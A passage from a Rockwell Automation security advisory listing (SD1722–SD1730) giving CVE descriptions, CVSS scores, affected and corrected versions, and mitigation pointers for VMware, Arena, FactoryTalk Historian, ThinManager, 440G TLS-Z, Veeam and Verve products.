CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-122: Heap-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

  • Security Best Practices

Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

  • Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Critical
SD1730 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities (CVE-2025-41236, CVE-2025-41237, CVE-2025-41238, CVE-2025-41239)
Published Date:
July 16, 2025
Last Updated:
July 16, 2025
CVE IDs:
CVE-2025-41236, CVE-2025-41237, CVE-2025-41238, CVE-2025-41239
CVSS Scores (v3.1):
9.3, 7.1
CVSS Scores (v4.0):
9.4, 8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 7/16/2025
Last Updated: 7/16/2025
Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
Industrial Data Center (IDC) with VMware | Generations 1 – 4 | Refer to Mitigations and Workarounds
VersaVirtual Appliance (VVA) with VMware | Series A & B | Refer to Mitigations and Workarounds
Threat Detection Managed Services (TDMS) with VMware | All | Refer to Mitigations and Workarounds
Endpoint Protection Service with Rockwell Automation Proxy & VMware only | All | Refer to Mitigations and Workarounds
Engineered and Integrated Solutions with VMware | All | Refer to Broadcom’s advisory

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract should refer to Broadcom’s advisories below:

  • Support Content Notification - Support Portal - Broadcom support portal

  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3f-release-notes.html

  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2e-release-notes.html

  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3w-release-notes.html

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-41236

An integer-overflow vulnerability exists in the VMXNET3 virtual network adapter used in VMware ESXi, Workstation, and Fusion. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41237

An integer-underflow vulnerability exists in the Virtual Machine Communication Interface (VMCI) of VMware ESXi, Workstation, and Fusion, which can lead to an out-of-bounds write. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41238

A heap-overflow vulnerability exists in the Paravirtualized SCSI (PVSCSI) controller of VMware ESXi, Workstation, and Fusion, which can lead to an out-of-bounds write. Exploitation of this vulnerability can lead to code execution on the host.

CVSS 3.1 Base Score: 9.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

CVE-2025-41239

An information disclosure vulnerability exists in vSockets due to the use of uninitialized memory in VMware ESXi, Workstation, Fusion, and VMware Tools. Exploitation of this vulnerability can result in the leakage of memory from processes communicating with vSockets.

CVSS 3.1 Base Score: 7.1
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.2
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Glossary:

  • VMXNET3: virtual network adapter optimized for VMware environments
  • VMware ESXi: hypervisor that enables virtualization of servers
  • VMware Workstation: desktop application that allows users to run multiple operating systems as virtual machines on a single PC
  • VMware Fusion: a macOS application that enables users to run Windows and other operating systems within a virtual environment
  • Code execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process
  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

High
SD1729 | Arena® Simulation Out-Of-Bounds Write Remote Code Execution Vulnerability
Published Date:
July 09, 2025
Last Updated:
July 09, 2025
CVE IDs:
CVE-2025-6377, CVE-2025-6376
Products:
Arena®
CVSS Scores (v3.1):
7.0, 7.8
CVSS Scores (v4.0):
8.4, 7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 7/9/2025
Last Updated: 7/9/2025
Revision Number: 1.0
CVSS Score: 7.1/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Software - Arena® | CVE-2025-6377 | 16.20.08 and earlier | 16.20.09 and later
Software - Arena® | CVE-2025-6376 | 16.20.08 and earlier | 16.20.09 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability. The vulnerability was reported by Zero Day Initiative (ZDI).

CVE-2025-6377 IMPACT

A remote code execution security issue exists in the affected product. A crafted DOE file can force Arena Simulation to write beyond the boundaries of an allocated object. Exploitation requires user interaction, such as opening a malicious file within the software. If exploited, a threat actor could execute arbitrary code on the target system. The software must run under the context of the administrator in order to cause worst-case impact. This is reflected in the Rockwell CVSS score as AT:P.

ZDI CVSS Score

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rockwell CVSS Score

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20 Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2025-6376 IMPACT 

A remote code execution security issue exists in the affected product. A crafted DOE file can force Arena Simulation to write beyond the boundaries of an allocated object. Exploitation requires user interaction, such as opening a malicious file within the software. If exploited, a threat actor could execute arbitrary code on the target system. The software must run under the context of the administrator in order to cause worst-case impact. This is reflected in the Rockwell CVSS score as AT:P.

ZDI CVSS Score

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rockwell CVSS Score

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20 Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied. 

  • Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Glossary

  • DOE File: A DOE file, or Design of Experiments file, is a document used to plan and organize an experiment efficiently. It helps in systematically arranging tests and analyzing the effects of multiple factors and their interactions on a response variable.

  • Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Critical
SD1728 | Apache Vulnerability in FactoryTalk® Historian-ThingWorx Connection Server
Published Date:
May 14, 2025
Last Updated:
May 14, 2025
CVE IDs:
CVE-2018-1285
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 5/15/2025
Last Updated: 5/15/2025
Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
95057C-FTHTWXCT11 | <= v4.02.00 | v5.00.00 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2018-1285

A vulnerability has been identified in the third-party Apache log4net software, impacting the FactoryTalk® Historian-ThingWorx Connector. This issue arises because versions of Apache log4net prior to 2.0.10 fail to disable XML external entities during the parsing of log4net configuration files. Consequently, a threat actor could exploit this to launch XXE-based attacks on applications that accept malicious log4net configuration files.

CVSS 3.1 Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Update to the corrected version if possible. Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

High
SD1727 | Local Privilege Escalation and denial-of-service Vulnerability in ThinManager®
Published Date:
April 15, 2025
Last Updated:
April 23, 2025
CVE IDs:
CVE-2025-3617, CVE-2025-3618
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Software - ThinManager | CVE-2025-3617 | 14.0.0 & 14.0.1 | v14.0.2 and later
Software - ThinManager | CVE-2025-3618 | v14.0.1 and earlier | v11.2.11, 12.0.9, 12.1.10, 13.0.7, 13.1.5, 13.2.4, 14.0.2 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Zero Day Initiative (ZDI).

CVE-2025-3617 IMPACT

A privilege escalation vulnerability exists in the affected product. When the software starts up, files are deleted in the temporary folder causing the Access Control Entry of the directory to inherit permissions from the parent directory. If exploited, a threat actor could inherit elevated privileges.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-276: Incorrect Default Permissions
Known Exploited Vulnerability (KEV) database: No

CVE-2025-3618 IMPACT

A denial-of-service vulnerability exists in the affected product. The software fails to adequately verify the outcome of memory allocation while processing Type 18 messages. If exploited, a threat actor could cause a denial-of-service on the target software.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

High
SD1726 | Local Code Execution Vulnerabilities in Arena®
Published Date:
April 07, 2025
Last Updated:
April 07, 2025
CVE IDs:
CVE-2025-2285, CVE-2025-2286, CVE-2025-2287, CVE-2025-2288, CVE-2025-2293, CVE-2025-2829, CVE-2025-3285, CVE-2025-3286, CVE-2025-3287, CVE-2025-3288, CVE-2025-3289
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 4/8/2025

Last updated: 4/8/2025

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
Arena® | 16.20.08 and earlier | 16.20.09

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Michael Heinzl.

CVE-2025-2285

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-457 Uninitialized Variable

CVE-2025-2286

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-457 Uninitialized Variable

CVE-2025-2287

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-457 Uninitialized Variable

CVE-2025-2288

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-787 Out of Bounds Write

CVE-2025-2293

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-787 Out of Bounds Write

CVE-2025-2829

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-787 Out of Bounds Write

CVE-2025-3285

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3286

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3287

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3288

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-125 Out of Bounds Read

CVE-2025-3289

A local code execution vulnerability exists in the affected products due to a stack-based memory buffer overflow. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

CWE: CWE-121 Stack-based Buffer Overflow

Users can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

Mitigations and Workarounds

Users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

• Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

High
SD1725 | Third-party Local Code Execution Vulnerability in 440G TLS-Z
Published Date:
March 24, 2025
Last Updated:
March 24, 2025
CVE IDs:
CVE-2020-27212
Products:
440G TLS-Z
CVSS Scores (v3.1):
7.0
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Published Date: 3/25/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving our customers' business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
440G TLS-Z | v6.001 | n/a – see mitigations

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

• Limit physical access to authorized personnel: control room, cells/areas, control panels, and devices. See Chapter 4, Harden the Control System, of the System Security Design Guidelines.

• For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-27212 IMPACT

A local code execution vulnerability exists in STMicroelectronics STM32L4 devices due to incorrect access controls. The affected product uses the STMicroelectronics STM32L4 device, and because of the vulnerability a threat actor could reverse the protections that control access to the JTAG interface. If exploited, a threat actor can take over the device.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE: CWE-1395 Dependency on a third-party Component & CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

CPE: cpe:2.3:h:st:stm32l431rc:-:*:*:*:*:*:*:*

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

Critical
SD1724 | Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities
Published Date:
March 21, 2025
Last Updated:
March 21, 2025
CVE IDs:
CVE-2025-23120
CVSS Scores (v3.1):
9.9
CVSS Scores (v4.0):
9.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 03/21/25

Last updated: 03/27/25

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improving our customers' business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Revision
Industrial Data Center (IDC) with Veeam | Generations 1 – 5 | Refer to Remediation and Workarounds
VersaVirtual™ Appliance (VVA) with Veeam | Series A - C | Refer to Remediation and Workarounds

REMEDIATIONS AND WORKAROUNDS

Users with an active Rockwell Automation Infrastructure Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract should refer to Veeam’s advisories below:

• Support Content Notification - Support Portal – Veeam support portal

• https://www.veeam.com/kb4724

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

• Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-23120

A remote code execution vulnerability exists in Veeam Backup & Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.

CVSS 3.1 Base Score: 9.9

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Critical
SD1723 | Admin Shell Access Vulnerability in Verve Asset Manager
Published Date:
March 20, 2025
Last Updated:
March 20, 2025
CVE IDs:
CVE-2025-1449
CVSS Scores (v3.1):
9.1
CVSS Scores (v4.0):
8.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 3/25/25

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Corrected in Software Revision
Verve Asset Manager | <=1.39 | V1.40

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-1449 IMPACT

A vulnerability exists in the affected product due to insufficient variable sanitizing. A portion of the administrative web interface for Verve's Legacy Agentless Device Inventory (ADI) capability (deprecated since the 1.36 release) allows users to change a variable with inadequate sanitizing. If exploited, it could allow a threat actor with administrative access to run arbitrary commands in the context of the container running the service.

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.9
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-1287: Improper Validation of Specified Type of Input
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization (SSVC) to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

• Security Best Practices

Critical
SD1722 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities
Published Date:
March 07, 2025
Last Updated:
March 07, 2025
CVE IDs:
CVE-2025-22224, CVE-2025-22225, CVE-2025-22226
CVSS Scores (v3.1):
9.3, 8.2, 7.1
CVSS Scores (v4.0):
9.4, 9.3, 8.2
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
Yes
The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improving all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
Industrial Data Center (IDC) with VMware | Generations 1 – 4 | Refer to Mitigations and Workarounds
VersaVirtual™ Appliance (VVA) with VMware | Series A & B | Refer to Mitigations and Workarounds
Threat Detection Managed Services (TDMS) with VMware | All | Refer to Mitigations and Workarounds
Endpoint Protection Service with RA Proxy & VMware only | All | Refer to Mitigations and Workarounds
Engineered and Integrated Solutions with VMware | All | Refer to Broadcom’s advisory

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract should refer to Broadcom’s advisories below:

• Support Content Notification - Support Portal - Broadcom support portal

• https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3d-release-notes.html

• https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2d-release-notes.html

• https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3s-release-notes.html

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

• Security Best Practices

 

VULNERABILITY DETAILS

